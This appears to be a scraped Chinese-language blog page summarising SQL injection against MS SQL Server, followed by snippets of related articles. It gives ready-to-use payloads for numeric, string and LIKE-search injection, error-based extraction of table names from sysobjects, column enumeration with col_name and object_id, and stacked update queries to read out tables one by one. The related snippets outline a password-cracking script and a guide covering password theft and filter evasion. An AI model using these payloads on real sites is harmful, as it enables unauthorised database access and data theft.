SQL注射總結 5

2021-04-02 09:37:43 字數 1796 閱讀 8660

通常注射的一些介紹

a) id=49 這類注入的引數是數字型,sql語句原貌大致如下:

select * from 表名 where 字段=49

注入的引數為id=49 and [查詢條件],即是生成語句:

select * from 表名 where 字段=49 and [查詢條件]

(b) class=連續劇 這類注入的引數是字元型,sql語句原貌大致概如下:

select * from 表名 where 字段='連續劇'

注入的引數為class=連續劇' and [查詢條件] and ''=' ,即是生成語句:

select * from 表名 where 字段='連續劇' and [查詢條件] and ''=''

(c) 搜尋時沒過濾引數的,如keyword=關鍵字,sql語句原貌大致如下:

select * from 表名 where 欄位like '%關鍵字%'

注入的引數為keyword=' and [查詢條件] and '%25'=', 即是生成語句:

select * from 表名 where欄位like '%' and [查詢條件] and '%'='%'

;;and (select top 1 name from sysobjects where xtype='u' and status>0)>0

sysobjects是sqlserver的系統表,儲存著所有的表名、檢視、約束及其它物件,xtype='u' and status>0,表示使用者建立的表名,上面的語句將第乙個表名取出,與0比較大小,讓報錯資訊把表名暴露出來。

;;and (select top 1 col_name(object_id('表名'),1) from sysobjects)>0

從⑤拿到表名後,用object_id('表名')獲取表名對應的內部id,col_name(表名id,1)代表該錶的第1個欄位名,將1換成2,3,4...就可以逐個獲取所猜解表裡面的欄位名。

post.htm內容:主要是方便輸入。

列舉出他的資料表名:

id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--

這是將第乙個表名更新到aaa的字段處。

讀出第乙個表,第二個表可以這樣讀出來(在條件後加上 and name<>'剛才得到的表名')。

id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');--

然後id=1552 and exists(select * from aaa where aaa>5)

讀出第二個表,^^^^^^乙個個的讀出,直到沒有為止。

讀字段是這樣:

id=1552;update aaa set aaa=(select top 1 col_name(object_id('表名'),1));--

然後id=1552 and exists(select * from aaa where aaa>5)出錯,得到欄位名

id=1552;update aaa set aaa=(select top 1 col_name(object_id('表名'),2));--

然後id=1552 and exists(select * from aaa where aaa>5)出錯,得到欄位名

關鍵字:軟體  伺服器  qq  os  msn  dos   美女 電影 ** ** 無極 汽車 ***

SQL注射總結 8

把 password sqlserver sql admin sesame sa guest here is the script sqlcrack.sql create table tempdb.passwords pwd varchar 255 bulk insert tempdb.passwo...

SQL注射資料(翻譯)

1 介紹 2 漏洞測試 3 收集資訊 4 資料型別 5 獲取密碼 6 建立資料庫帳號 7 mysql作業系統互動作用 8 伺服器名字與配置 9 從登錄檔中獲取vnc密碼 10 逃避標識部分訊號 11 用char 進行mysql輸入確認欺騙 12 用注釋逃避標識部分訊號 13 沒有引號的字串 1 當伺...

URL編碼與SQL注射

說到url編碼,你或許會想起n年前的url編碼漏洞。可惜我是 生不逢時 啊,我接觸網路時,那個漏洞早就絕跡咯。言歸正傳,url 編碼是什麼東東呢?看看我從網上抄的定義 引用 url編碼是一種瀏覽器用來打包表單輸入的格式。瀏覽器從表單中獲取所有的name和其中的值 將它們以name value引數編碼...